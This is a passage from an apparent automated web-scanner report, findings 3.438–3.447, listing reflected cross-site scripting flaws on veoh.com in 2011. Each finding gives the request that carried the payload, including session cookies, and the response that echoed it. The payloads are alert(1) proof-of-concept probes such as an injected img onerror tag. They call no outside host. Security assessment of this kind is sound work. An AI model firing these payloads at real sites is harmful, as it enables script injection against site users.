The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 218d8'%3b167cb8b726a was submitted in the REST URL parameter 6. This input was echoed as 218d8';167cb8b726a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr218d8'%3b167cb8b726a HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 94329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'6517df68b38a6e9c69de74651b741324',
'v20759029Mf8YXNhr218d8';167cb8b726a'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.438. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a was submitted in the REST URL parameter 4. This input was echoed as 1b947"><img src=a onerror=alert(1)>1a22388a0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:34:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=75
Content-Length: 57867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/action_adventure4957f1b947"><img src=a onerror=alert(1)>1a22388a0a/sort/most viewed" selected="selected">
...[SNIP]...

3.439. http://www.veoh.com/browse/videos/category/action_adventure4957f [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 was submitted in the REST URL parameter 4. This input was echoed as 265a6<img src=a onerror=alert(1)>59b74d09c35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 57833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure4957f265a6<img src=a onerror=alert(1)>59b74d09c35"}</textarea>
...[SNIP]...

3.440. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag attribute. The payload f915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7 was submitted in the REST URL parameter 4. This input was echoed as f915b><img src=a onerror=alert(1)>991aab001b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f"><img%20srcf915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=40
Content-Length: 76933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img srcf915b><img src=a onerror=alert(1)>991aab001b7=a onerror=alert(1)>
...[SNIP]...

3.441. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f"><img%20src=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35 was submitted in the REST URL parameter 4. This input was echoed as ddc51<img src=a onerror=alert(1)>095a10c6f35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 76573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_ddc51<img src=a onerror=alert(1)>095a10c6f35=a onerror=alert(1)>
...[SNIP]...

3.442. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee was submitted in the REST URL parameter 4. This input was echoed as 94381<img src=a onerror=alert(1)>52a0288ccee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d81594381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 77063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<img src=a onerror=alert(1)>b411440d81594381<img src=a onerror=alert(1)>52a0288ccee/sort/most viewed" selected="selected">
...[SNIP]...

3.443. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a was submitted in the REST URL parameter 4. This input was echoed as ba538"><img src=a onerror=alert(1)>0ced7d2746a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/animationba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=12
Content-Length: 74545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/animationba538"><img src=a onerror=alert(1)>0ced7d2746a/sort/most viewed" selected="selected">
...[SNIP]...

3.444. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d was submitted in the REST URL parameter 4. This input was echoed as cd065<img src=a onerror=alert(1)>a077cbaf92d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/animationcd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 74501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_animationcd065<img src=a onerror=alert(1)>a077cbaf92d"}</textarea>
...[SNIP]...

3.445. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /browse/videos/category/animation/watch/v20767083WdnCj7gW

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14c7e'%3b1844de9a605 was submitted in the REST URL parameter 6. This input was echoed as 14c7e';1844de9a605 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/videos/category/animation/watch/v20767083WdnCj7gW14c7e'%3b1844de9a605 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 93332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
trics.logRecommendedClickEvent(
primaryKey,
index,
'errorPageC',
'',
'aa49d30e823c344f940751878361a0f0',
'v20767083WdnCj7gW14c7e';1844de9a605'
);
} catch(e) {
}

return true;
};

var getSourceIndex = function(source) {
if (!$defined( source ) || !$defined( source.id )) {
return NaN;
}

re
...[SNIP]...

3.446. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1 was submitted in the REST URL parameter 4. This input was echoed as fcae8"><img src=a onerror=alert(1)>26d66e628b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/celebrity_and_showbizfcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=50
Content-Length: 77572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<option value="/browse/videos/category/celebrity_and_showbizfcae8"><img src=a onerror=alert(1)>26d66e628b1/sort/most viewed" selected="selected">
...[SNIP]...

3.447. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160 was submitted in the REST URL parameter 4. This input was echoed as fb1e3<img src=a onerror=alert(1)>01b1c12b160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /browse/videos/category/celebrity_and_showbizfb1e3<img%20src%3da%20onerror%3dalert(1)>01b1c12b160/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=9
Content-Length: 77528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
